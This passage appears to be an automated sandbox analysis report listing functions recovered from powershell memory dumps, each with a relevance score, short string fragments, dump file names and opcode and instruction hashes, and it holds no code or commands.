Function 07785320 Relevance: 7.9, Strings: 6, Instructions: 373COMMON

Download Yara Rule

Strings

-k, xrefs: 07785739
4'q, xrefs: 07785629
x.k, xrefs: 077856F4
4'q, xrefs: 077856A8
4'q, xrefs: 07785635
4'q, xrefs: 077856B4

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$x.k$-k
API String ID: 0-3499190445
Opcode ID: 292d0ab928559598667efda775bc33b6579827d8bad44cf9a1f097c59428e764
Instruction ID: 03d1ae1efeca9d85ac3bdd74b2463654a9306e06ff3e65cabd9b43cf2f2d327d
Opcode Fuzzy Hash: 292d0ab928559598667efda775bc33b6579827d8bad44cf9a1f097c59428e764
Instruction Fuzzy Hash: A2E1D174B402058FEB14EBA9C554B9EBBB3AF88345F24C429E9016F395CB36EC42CB51

Function 07780778 Relevance: 6.5, Strings: 5, Instructions: 233COMMON

Download Yara Rule

Strings

$q, xrefs: 077807E7
$q, xrefs: 077807F3
$q, xrefs: 077807CB
4'q, xrefs: 0778080C
4'q, xrefs: 07780818

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$$q$$q$$q
API String ID: 0-170447905
Opcode ID: de3021d878923bc4fd8e4ea40eddf992fcff5f7a9e142e9b81f935d66170c5ef
Instruction ID: d25b24ab29cda211164ab9ab37a88e63a10f82dcc04b5133fdd35512b0b75e25
Opcode Fuzzy Hash: de3021d878923bc4fd8e4ea40eddf992fcff5f7a9e142e9b81f935d66170c5ef
Instruction Fuzzy Hash: 2B717AB1B402068FDB64AB79D8012BABBB2EFC5250F24847AD805DB341DB32C849C7E1

Function 07784517 Relevance: 5.7, Strings: 4, Instructions: 722COMMON

Download Yara Rule

Strings

4'q, xrefs: 0778499E
4'q, xrefs: 077849AA
x.k, xrefs: 07784C05
-k, xrefs: 07784C37

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$x.k$-k
API String ID: 0-3832083339
Opcode ID: efbfb0c167a346da4d2b71b68538c0670b97d81cc80b58e24b208de330eaefd9
Instruction ID: 3033a572e1e980b9f44cda329664a0047d69fe1707fc55910ab4ee74d3c24a1b
Opcode Fuzzy Hash: efbfb0c167a346da4d2b71b68538c0670b97d81cc80b58e24b208de330eaefd9
Instruction Fuzzy Hash: 57528EB4B40205DFEB64DF54C850BAABBB2BF89304F54C499D919AF391CB72EC418B91

Function 0778C457 Relevance: 5.5, Strings: 4, Instructions: 452COMMON

Download Yara Rule

Strings

4'q, xrefs: 0778C868
x.k, xrefs: 0778CAA3
4'q, xrefs: 0778C874
-k, xrefs: 0778CAD5

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$x.k$-k
API String ID: 0-3832083339
Opcode ID: 61ae522fda04ee41fd47688d7f12677f97359823b864643c9da3e099e2803f2e
Instruction ID: a0fcb953b864a85cd8c243cdeffacb8b7bf632e5fc00e04d59db44061b19698f
Opcode Fuzzy Hash: 61ae522fda04ee41fd47688d7f12677f97359823b864643c9da3e099e2803f2e
Instruction Fuzzy Hash: 44126E70B003149FE765DB58C951BABBBB2AF85305F10C4D8D909AF395CB72ED828B91

Function 07785302 Relevance: 5.3, Strings: 4, Instructions: 305COMMON

Download Yara Rule

Strings

-k, xrefs: 07785739
4'q, xrefs: 07785629
x.k, xrefs: 077856F4
4'q, xrefs: 077856A8

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$x.k$-k
API String ID: 0-3832083339
Opcode ID: 1187726455b991d033dc40978493ba655f831433471bb6cfa36e820c512919bc
Instruction ID: 63eba09511538d015ee48410fc0806ab1c4e9467ddc1016753457df9b8177342
Opcode Fuzzy Hash: 1187726455b991d033dc40978493ba655f831433471bb6cfa36e820c512919bc
Instruction Fuzzy Hash: 4EC1CDB4B402059FEB14EB58C550B9EBBB3AF88349F24C469E8056F395CB32EC42CB51

Function 07784CCA Relevance: 4.3, Strings: 3, Instructions: 595COMMON

Download Yara Rule

Strings

4'q, xrefs: 0778499E
x.k, xrefs: 07784C05
-k, xrefs: 07784C37

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$x.k$-k
API String ID: 0-196464176
Opcode ID: cfe7d2aaef876c389bd3da0d3397664262d0d6ec94d48b10041a050b1aaca714
Instruction ID: c9a987dc1a3b9301a5f690dec5b7382b1e61caa36b59875efdaeb3af08661021
Opcode Fuzzy Hash: cfe7d2aaef876c389bd3da0d3397664262d0d6ec94d48b10041a050b1aaca714
Instruction Fuzzy Hash: 76428D74B40215DFE764DF58C850F6ABBB2BB88308F55C099E918AF391CB72ED418B51

Function 0778CB6E Relevance: 4.3, Strings: 3, Instructions: 571COMMON

Download Yara Rule

Strings

4'q, xrefs: 0778C868
x.k, xrefs: 0778CAA3
-k, xrefs: 0778CAD5

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$x.k$-k
API String ID: 0-196464176
Opcode ID: 08308a8492fbb73a5361b22de22f6a4c9d9af34bc1e5634626b176b9c0cfafd0
Instruction ID: adba4c4dc78e5e27b1dbd566b50e60e2915bebddef2249c949f7476d7e75a67f
Opcode Fuzzy Hash: 08308a8492fbb73a5361b22de22f6a4c9d9af34bc1e5634626b176b9c0cfafd0
Instruction Fuzzy Hash: 85326E70B403149FE764DB14C951B9BBBB2AF89305F10C4D9D909AF391CB72ED828BA1

Function 048CAFE8 Relevance: 4.3, Strings: 3, Instructions: 518COMMON

Download Yara Rule

Strings

$q, xrefs: 048CB202
Hq, xrefs: 048CB0AE
$q, xrefs: 048CB567

Memory Dump Source

Source File: 00000002.00000002.1623792645.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_48c0000_powershell.jbxd

Similarity

API ID:
String ID: Hq$$q$$q
API String ID: 0-405414136
Opcode ID: 95f16dc27972bf74c9ee2f71942e7faebfc18a04a3623f6fb9ce1fe288274a92
Instruction ID: 9168336bd13f1d321576bd5ef05231c3eb798a1c57692c54fa2c6abee6022dbf
Opcode Fuzzy Hash: 95f16dc27972bf74c9ee2f71942e7faebfc18a04a3623f6fb9ce1fe288274a92
Instruction Fuzzy Hash: CC226E30B006188FCB65EB25D855AAEBBB2AF89304F1485A9D409EB351DF35ED85CF81

Function 07784DD3 Relevance: 4.2, Strings: 3, Instructions: 436COMMON

Download Yara Rule

Strings

4'q, xrefs: 0778499E
x.k, xrefs: 07784C05
-k, xrefs: 07784C37

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$x.k$-k
API String ID: 0-196464176
Opcode ID: aacde42a213183b5452bd5cfe10e0213096bd1bbb3282fcdb2d17c4184cfeacf
Instruction ID: 9f6be52a129aeac1e13d1f4fcb6b5f2a326d68b45a7a168df1ef36081db488ed
Opcode Fuzzy Hash: aacde42a213183b5452bd5cfe10e0213096bd1bbb3282fcdb2d17c4184cfeacf
Instruction Fuzzy Hash: E2026C74B40215DFEB64DF54C950BAABBB2BB88304F51C099E918AF391CB72ED418B51

Function 0778CC56 Relevance: 4.2, Strings: 3, Instructions: 417COMMON

Download Yara Rule

Strings

4'q, xrefs: 0778C868
x.k, xrefs: 0778CAA3
-k, xrefs: 0778CAD5

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$x.k$-k
API String ID: 0-196464176
Opcode ID: 8bf8287137c889ba3085a850300ea30960b706d3a74dcd706851bed3d7fb424b
Instruction ID: d16912b67d4357f62d1553d11a1e28a7a71bf5cfff54738bd6b25d7d497a1176
Opcode Fuzzy Hash: 8bf8287137c889ba3085a850300ea30960b706d3a74dcd706851bed3d7fb424b
Instruction Fuzzy Hash: B8025D70B003149FE765DB14C955BABBBB2AB85305F10C4D9D909AF385CB72ED828F91

Function 07781040 Relevance: 3.0, Strings: 2, Instructions: 529COMMON

Download Yara Rule

Strings

tPq, xrefs: 077810D7
tPq, xrefs: 077810CB

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: tPq$tPq
API String ID: 0-4270251778
Opcode ID: d9361f90efa55e3ba17d7b5791bf8a185d478d096a69312080591de1580b05f1
Instruction ID: 48360d08102783220e3427c09d8594138b78e8820ce78642212aa8192e5fd46b
Opcode Fuzzy Hash: d9361f90efa55e3ba17d7b5791bf8a185d478d096a69312080591de1580b05f1
Instruction Fuzzy Hash: 0912C570B402099FE754DB98C851B6ABBB2EF85314F64C46EE9059F391CB72EC42CB52

Function 07780A80 Relevance: 2.7, Strings: 2, Instructions: 173COMMON

Download Yara Rule

Strings

tPq, xrefs: 07780B30
tPq, xrefs: 07780B24

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: tPq$tPq
API String ID: 0-4270251778
Opcode ID: 1e3efc09c6a6a2d4106824a3284ea24727b768cb645cdbd399ff0789a1b1dd48
Instruction ID: 52c0ddd9e492c7cd4f253a0132f827b35b671fa477086e9fc7e08ffd37e7d77b
Opcode Fuzzy Hash: 1e3efc09c6a6a2d4106824a3284ea24727b768cb645cdbd399ff0789a1b1dd48
Instruction Fuzzy Hash: C051A972B443068FDB616B69D8017ABBFA2AFC6355F18C47BE545CB381CA31C849C3A1

Function 0778D063 Relevance: 1.6, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

x.k, xrefs: 0778D3C6

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: x.k
API String ID: 0-3814145804
Opcode ID: 9dc84024a42ceb8ff1123c61dd5ca5b6b9bbb5ae8fa071d184918d3181f63962
Instruction ID: c615aec1d04d5c2c7feedb70ee258b5884bca9de305cc5fd55267fb4adb98602
Opcode Fuzzy Hash: 9dc84024a42ceb8ff1123c61dd5ca5b6b9bbb5ae8fa071d184918d3181f63962
Instruction Fuzzy Hash: E0D13AB0B50218CFEB64DB64C954B9AB772AF89345F20C499D9096B381CB32ED81CF91

Function 048C72A0 Relevance: 1.6, Strings: 1, Instructions: 315COMMON

Download Yara Rule

Strings

`, xrefs: 048C730D

Memory Dump Source

Source File: 00000002.00000002.1623792645.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_48c0000_powershell.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: b0dc6860fa30506c027c46256cae679d64a823ff4e3b818fc2eebfa4f0abcb22
Instruction ID: fb7c317995eb2aae8daf1891d3b26e8425fdef1f69d0671bad8cbb803ad39be7
Opcode Fuzzy Hash: b0dc6860fa30506c027c46256cae679d64a823ff4e3b818fc2eebfa4f0abcb22
Instruction Fuzzy Hash: 07C17C31A002099FDB14DFA5D544A9DBBB2FF84314F158A69E406EB364DB34ED49CF80

Function 0778D08F Relevance: 1.5, Strings: 1, Instructions: 227COMMON

Download Yara Rule

Strings

x.k, xrefs: 0778D3C6

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: x.k
API String ID: 0-3814145804
Opcode ID: afa62ed10208cba1078285b3c0f6f37059b8d9b0b21c7e761413f50649ed2787
Instruction ID: d75aa5a13c8df93982d319d3cd4ba6e4444aa1f1500cbb581b20aae5d8dbfd92
Opcode Fuzzy Hash: afa62ed10208cba1078285b3c0f6f37059b8d9b0b21c7e761413f50649ed2787
Instruction Fuzzy Hash: 44A169B0B40215CFEB649B24C955B9AB7B2BF89345F10C498D5096F782CB32ED86CF91

Function 0778D084 Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

x.k, xrefs: 0778D3C6

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: x.k
API String ID: 0-3814145804
Opcode ID: 0cd483c0f8a3766545de3ca8a2336c5ded19b896c763688cab70b4f261c5cc15
Instruction ID: 654a9383d46dca374310ae2bf78f15bea31ac3a769bc29b9d3c316b5605ee25a
Opcode Fuzzy Hash: 0cd483c0f8a3766545de3ca8a2336c5ded19b896c763688cab70b4f261c5cc15
Instruction Fuzzy Hash: 169157B0B40215CFE7649B24C955BAAB7B2BF89345F10C4D8D5096B782CB32ED85CF91

Function 077857C0 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

x.k, xrefs: 07785872

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: x.k
API String ID: 0-3814145804
Opcode ID: 641198ed83519448d8091a9aa09543fa1349f1e6b6d6758f69225cb669fc2ff6
Instruction ID: 530db1a18c5e25dfce1fe353d1fb0a54cf3f65b8d66cc6958fb8c4ca52a0f50e
Opcode Fuzzy Hash: 641198ed83519448d8091a9aa09543fa1349f1e6b6d6758f69225cb669fc2ff6
Instruction Fuzzy Hash: 1C319374B402049FE715AB64C915BAF7B63AB88354F20C428E9017F391CF76EC428B95

Function 048CEACC Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1623792645.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_48c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c6fb19d830a47e21f7b39b8f63a9fd912934b51bb70f5e8716bdc6ddf127acc
Instruction ID: 317c068b78be28a62bbb25e8c30612a48d5e1e66001f6ac584a3ebacad368f2a
Opcode Fuzzy Hash: 1c6fb19d830a47e21f7b39b8f63a9fd912934b51bb70f5e8716bdc6ddf127acc
Instruction Fuzzy Hash: CBB16F71E00259DFDB20CFA9C8857ADBBF2AF48314F148A2DE815E7254EB74E845CB91

Function 048CF39C Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1623792645.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_48c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80b17986aa9a640a1fc84f629271353e8cc336f6d3024b6c66e28c12c6ae8acc
Instruction ID: cade4f9b7789f86f44366608b378f75e2bf05206c8b359bec5e08a47a187167c
Opcode Fuzzy Hash: 80b17986aa9a640a1fc84f629271353e8cc336f6d3024b6c66e28c12c6ae8acc
Instruction Fuzzy Hash: 8CB15171E00219DFEB10CFA8D885B9DBBF2AF48314F148A2DD615E7294EB74E845CB85

Function 048C2AA0 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1623792645.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_48c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc1ff253d11ad3d7345b11f138b8b0b100fdec606c6829313453178c6170ec4c
Instruction ID: 760f97c89730713e5c16a18bf065bc042feb650197739128e3ae36e651e27669
Opcode Fuzzy Hash: bc1ff253d11ad3d7345b11f138b8b0b100fdec606c6829313453178c6170ec4c
Instruction Fuzzy Hash: 1F916E74A04209CFCB15CF58C494AAAFBB1FF49310B248A99E955DB3A5C736FC51CBA0

Function 048C7A68 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1623792645.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_48c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1c3af06a158284921db0f8842b629138df457f12ae004beaf3f1561b8c06058
Instruction ID: d42bc008357be32eea3fa7b5e36451b171331fa07620016d510f26702b1dd691
Opcode Fuzzy Hash: a1c3af06a158284921db0f8842b629138df457f12ae004beaf3f1561b8c06058
Instruction Fuzzy Hash: 0D716971A006098FDB24DF68C880A9DFBB6BF89354F148A6AD419DB751DB70EC06CB90

Function 048C7BD6 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1623792645.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_48c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3394ec50f6281e16fde1eed8d8f8d8cb67be899257f001ac44d85592c7c1800e
Instruction ID: 1233c4f2ff74119620db4448184d34febe99f0434ffb3c9f5eec814f2a7a7e72
Opcode Fuzzy Hash: 3394ec50f6281e16fde1eed8d8f8d8cb67be899257f001ac44d85592c7c1800e
Instruction Fuzzy Hash: AA712970E002099FDB24DFA9D454BADBBB2BF88304F14896DE412AB794DB34AD45CF51

Function 048C77F9 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1623792645.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_48c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5521c3d811cbfe83d0d2546dad8165614780410caf87c2dc1327812525184780
Instruction ID: fe0beb1dadbdb1bdf8f95c6e7cce2987aa1cf3a3c60752e1a696a1f60d56c881
Opcode Fuzzy Hash: 5521c3d811cbfe83d0d2546dad8165614780410caf87c2dc1327812525184780
Instruction Fuzzy Hash: D3416A75A402098FDB159B30D854AAABBB2EF89354F08496CE406EB7A0DF34ED41CB90

Function 048C7A53 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1623792645.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_48c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeb349049ad1d12a946ad9d0d0295e311bcecfcd3bd85a2c464072020238ff07
Instruction ID: 0198418833f18ced4d23994de77fe3a6d63f03b96fb231c81156888785c07e77
Opcode Fuzzy Hash: aeb349049ad1d12a946ad9d0d0295e311bcecfcd3bd85a2c464072020238ff07
Instruction Fuzzy Hash: 2E415A70E002098FDB28DFA9D8547ADFBB2BF89344F14896DD005AB794DB70A945CF90

Function 048C2BB0 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1623792645.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_48c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6263d17f8a82a6e2b3a5b9a3d2b91155a40b006de0f19fbe599c52a8f0e21bea
Instruction ID: 994e021a693ea1f5f5a012fb56f9b647b2f740e8cc1ec2381c3a0dd22a5b87da
Opcode Fuzzy Hash: 6263d17f8a82a6e2b3a5b9a3d2b91155a40b006de0f19fbe599c52a8f0e21bea
Instruction Fuzzy Hash: F4413A74A006098FCB15CF58D494AAAF7B1FF48324B158699D916AB3A4C736FC91CFA0

Function 07785995 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9610706f76cdd9ea51ddb0cd05a0a51823f979f8fd7595f77efb47e256c50320
Instruction ID: e065ef62e06a2cdb6e65f89ebe0d4f03eb7ac711babbcf2048af099402374f34
Opcode Fuzzy Hash: 9610706f76cdd9ea51ddb0cd05a0a51823f979f8fd7595f77efb47e256c50320
Instruction Fuzzy Hash: ED316BB27402128FEB686635D59137ABF929FC1250F14887BD602DF281EB36D861C3A3

Function 07780DE8 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d37d0478fb0063d79c3125ebc76c944d53aff725c2ed712ff6ff45481a8b42b2
Instruction ID: e1056140523061ea07923c8ac3517f34ded5527e5a546f50a2355c0486ca3a1b
Opcode Fuzzy Hash: d37d0478fb0063d79c3125ebc76c944d53aff725c2ed712ff6ff45481a8b42b2
Instruction Fuzzy Hash: 3B2157B134030A9BE7783A7AD81173B76C6AFC4395F24882FA545DB2C0CA72D855C360

Function 048CBCA0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1623792645.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_48c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 563503e2576e00e5c919f429e5d5846fba9e1063bc7bf13411ae6187a6f841b8
Instruction ID: fff7e72060beee539960686eec0ba14e2e2cbb101183d2e69165bfab599bef1c
Opcode Fuzzy Hash: 563503e2576e00e5c919f429e5d5846fba9e1063bc7bf13411ae6187a6f841b8
Instruction Fuzzy Hash: 41315C30B011188FCB25EB74C8556EEB7B2AF89308F1049E9D509AB351CB35EE86CF81

Function 07780DCB Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6b8444b24ceea06adbe34b0e10a3a13733d3959b787d3167307cc81e36d45b2
Instruction ID: c5d6d75fe09e32b2fac924eeb65fe298ebab8ac3b4cfe87a85dd78b896f68292
Opcode Fuzzy Hash: b6b8444b24ceea06adbe34b0e10a3a13733d3959b787d3167307cc81e36d45b2
Instruction Fuzzy Hash: 1B219BB134434A6BE7A42676C8017673F969F82394F28846FFA80DB2C2CA75C844C365

Function 077808F0 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4aef132ce9d33e4bcbac7f245cdd39af635ada773106291db8dd4fd41464593
Instruction ID: c278754b454ed85a7b2700a91dd6006c0dc15f5b7fdb4fe471198f0040c68e56
Opcode Fuzzy Hash: e4aef132ce9d33e4bcbac7f245cdd39af635ada773106291db8dd4fd41464593
Instruction Fuzzy Hash: EC11D5B1A00219DFDB54AFB5C8012BDB7E5BF84250B298569DC19EB240D6309D44CBE5

Function 02E7D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1622564839.0000000002E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e7d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33ad4c5f95cd1f9947a48a518b41108aff48f9a2468d9a11f516d55800a83996
Instruction ID: be80ddde6aad119bb6d681a287893e3ccac81a1b6ad36230fc4e2b78b2e2c5dd
Opcode Fuzzy Hash: 33ad4c5f95cd1f9947a48a518b41108aff48f9a2468d9a11f516d55800a83996
Instruction Fuzzy Hash: A30126314483409FEB204A21CCC4B67BF9CDF41239F18E45AEC484F282C3B89846CBB2

Function 048C95C3 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1623792645.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_48c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c60c795da1790a7b0c5de846b4515dcce7d2d5e145140dd55102a61671b06e9a
Instruction ID: 8a9995192a03941fd3f669100e260c603912bdccd6730f5f72e1c26ecb480589
Opcode Fuzzy Hash: c60c795da1790a7b0c5de846b4515dcce7d2d5e145140dd55102a61671b06e9a
Instruction Fuzzy Hash: 3A012CB8A002189FDB00DB98D490AA9F761FF8E314B249299D85A97361CA36EC039B50

Function 07787F0B Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bfd4d199f6cbe7cffa4b66ce2b9c769a0b628d819195099059684e7c72234ff
Instruction ID: afe5ca196ac4a78ad6fdb1f1385dc4b3293d2661c990f9846ba9596d0a71e4bd
Opcode Fuzzy Hash: 4bfd4d199f6cbe7cffa4b66ce2b9c769a0b628d819195099059684e7c72234ff
Instruction Fuzzy Hash: 09F0E1F6E842114BD62965BA98033927B52ABC12D4F2408ABCD07AF341E232EC03C3D0

Function 02E7D01C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1622564839.0000000002E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e7d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e03a9c3736de5a4293720f1e23bd7350ed31bca838635f72954f2e7ca7f221ea
Instruction ID: 564dd052a24b37f226e1477a4dd445ca529e0be32d68f1faec2025bc117746af
Opcode Fuzzy Hash: e03a9c3736de5a4293720f1e23bd7350ed31bca838635f72954f2e7ca7f221ea
Instruction Fuzzy Hash: FBF06271445344AEEB108A15CD84B62FF9CEF41639F18D55AED484A286C3B99845CBB1

Function 07787ED6 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fbf183b453ec0bbf8c5f5f18943442cd5e68ff2fea7e5ec34bdf6435aa71f7e
Instruction ID: f261776a31ed15a563f64af4706303bfb33a76753453c3ba442b7ace00fbfe41
